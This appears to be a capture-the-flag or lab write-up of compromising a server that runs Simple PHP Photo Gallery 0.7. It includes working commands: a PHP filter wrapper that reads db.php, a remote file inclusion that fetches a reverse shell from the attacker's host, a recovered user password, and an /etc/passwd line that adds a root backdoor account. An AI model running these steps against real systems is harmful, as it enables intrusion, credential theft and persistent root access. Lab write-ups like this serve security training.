NETWORK

ENUMERATION

HTTP port 80

We are dealing with Simple PHP Photo Gallery

FOOTHOLD

RFI in SimplePHPGal 0.7

A bit of research around Simple PHP Photo Gallery has led us to a remote file inclusion (RFI) in SimplePHPGal https://www.exploit-db.com/exploits/48424

PRIV ESCALATION

Retrieving DB password

Running Gobuster, we have discovered a file db.php

gobuster dir -u http://192.168.166.58 -w /usr/share/wordlists/dirb/big.txt -eqz -x php,txt,md,sql

We can then read this file using the base64 wrapper

curl -s -L http://192.168.166.58/image.php\?img\=php://filter/convert.base64-encode/resource\=db.php

When decoded, using XX we get the following

Low access shell

With revshell we can create

Then calling this shell from our remote file inclusion (RFI) with the following

curl http://192.168.166.58/image.php\?img\=http://192.168.49.166/php-reverse-shell.php

We can catch a reverse shell on our local machine

MySQL enumeration

Using our database access

We can retrieve user Michael password

username: michael
password: U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==

double base64
HockSydneyCertify123

Shell as Michael

With the credentials found at the previous step we now have access to the machine as user michael

Add backfoor hacker user

Looking into the permissions, we can see that we can write to the /etc/passwd

Let’s add the user hacker/hacker to the /etc/passwd

First we have to generate a password with one of the following commands.

openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Then add the user hacker with the password hacker

echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd